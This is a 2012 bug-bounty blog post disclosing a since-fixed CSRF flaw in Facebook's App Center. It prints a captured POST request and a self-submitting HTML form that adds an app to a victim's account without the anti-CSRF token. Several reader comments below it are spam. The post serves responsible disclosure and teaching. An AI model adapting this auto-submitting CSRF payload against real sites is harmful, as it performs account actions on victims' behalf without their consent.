Sunday, 19 August 2012

Facebook CSRF worth USD 5000

This post is about a Cross-Site Request Forgery (CSRF) bug in Facebook I recently reported & now fixed. One fine day, when I logged into Facebook, I noticed a new feature "Appcenter". This feature allows you to choose apps you need. Game apps like Farmvilla are more popular.

I was previously working on apps, so decided to give a shot to this new feature. The game apps, when clicked "Play Game" button, was generating a POST request.

Example:

POST /connect/uiserver.php HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.facebook.com/appcenter/bubbleisland?fb_source=appcenter
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800

fb_dtsg=AQA-UJ7c&perms=email%2Cpublish_actions&new_perms=ASLlW7IHiYKu-ZMcemoLEUlDlumPU0z7d0gOzKM5z2BfP1Z-zw8cdicB23IOy6AdtrbRYjH8aVKwjIfgWruVFWYpjz26INpaKwAQhsPclOtPvQ&orig_perms=ASKG-CjoMB7nJHLuWUICKb1rxAeU8wUcn7qi9rO2VwppP0UB1zJd7M4rZexK5spGmPrPbDPCHPaQBSKCGauSOx4pl-M-43-YbyP0Wxo9wmmsyQ&dubstep=1&new_user_session=1&grant_clicked=1&send_to_mobile_redirect_uri=https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Fbubbleisland%3Ffb_source%3Dappcenter&app_id=124194560873&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fbubbleisland%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1&app_center=1&is_paid_app=&app_center_ref=appcenter&response_type=none&from_post=1&__uiserv_method=permissions.request&grant_clicked=Play+Game&GdpEmailBucket_grantEmailType=contact_email&audience%5B501245709901917%5D%5Bvalue%5D=40

There are many new parameters added in this new feature. Parameter 'fb_dtsg' is like token and 'perm' are the permissions required by the apps. Parameters 'redirect_url','app_id' are app specific values. Remaining parameters seems static except 'new_perms' & 'orig_perms'. I started to play with these two dynamic params and after few attempts, I knew that these params no longer needed to add an app. 

Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!

Final PoC for this CSRF looks like this:


<html>
<head>
</head>
<body onload=document.forms[0].submit();>
<form action="https://www.facebook.com/connect/uiserver.php" method="POST">
        <input type="hidden" name="perms" value="" />
        <input type="hidden" name="dubstep" value=1 />
        <input type="hidden" name="new_user_session" value=1 />
        <input type="hidden" name="grant_clicked" value=1 />
        <input type="hidden" name="send_to_mobile_redirect_uri" value="https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Ftexas_holdem%3Ffb_source%3Dappcenter" />
        <input type="hidden" name="app_id" value="2389801228" />
        <input type="hidden" name="redirect_uri" value="https%3A%2F%2Fapps.facebook.com%2Ftexas_holdem%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1" />
        <input type="hidden" name="app_center" value=1 />
        <input type="hidden" name="is_paid_app" value="" />
        <input type="hidden" name="app_center_ref" value="appcenter" />
        <input type="hidden" name="response_type" value="none" />
        <input type="hidden" name="from_post" value=1 />
        <input type="hidden" name="__uiserv_method" value="permissions.request" />
        <input type="hidden" name="grant_clicked" value="Play+Game" />
</form>
</body>
</html>

This functionality was used for other apps as well such as music apps, developers apps. Facebook Security team awarded this bug with $5000.

Facebook was pretty fast to address this issue and resolved this the next day itself. I'm very thankful to Facebook Security Team.

16 comments:

  1. Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!


    Awesome Find mate !!

    ReplyDelete
  2. Congrats buddy.You are awesome as usual. :)

    ReplyDelete
  3. Congrats bro. Awesome finding. :)

    ReplyDelete
  4. Guy, you're genius because you TRIED it. I always believe that FB/Twitter are not that stupid to skip token verification. but now HAHAHA

    P.S. i love csrf http://homakov.blogspot.com/2012/03/hacking-skrillformer-moneybookers.html

    ReplyDelete
  5. +1 on Egors post. I would have thought "nah, if they check that token on five scripts, they check it on every script" :D
    Nice find and enjoy your additional months salary ;)

    Did you try to find an exploit by hand or use an automatic tool?

    ReplyDelete
  6. Thansk everyone.
    @Egor, I think it was my lucky time. Btw, your work on CSRF is gr8
    @archi, mostly do it manually with FF adsons

    ReplyDelete
  7. I was stunned to see that in this new function, somehow designer skipped this factor and it was possible to add app without 'fb_dtsg'.

    AllenCarlos

    ReplyDelete
  8. Well done, really impressive

    Keep the good work up !

    ReplyDelete
  9. wow, great, I was wondering how to cure acne naturally. and found your site by google, learned a lot, now i’m a bit clear. I’ve bookmark your site and also add rss. keep us updated.
    Buy Facebook Likes Cheap

    ReplyDelete
  10. You have raised an important issue..Thanks for sharing..I would like to read more current affairs from this blog..keep posting..
    buy facebook likes cheap

    ReplyDelete
  11. The content is great, and you’re an educated writer unlike most of the blogs.thanks for the post.
    courtney jones atlanta

    ReplyDelete
  12. Wow, Excellent post. This article is really very interesting and effective. I think its must be helpful for us. Thanks for sharing your informative. Buy Facebook Likes

    ReplyDelete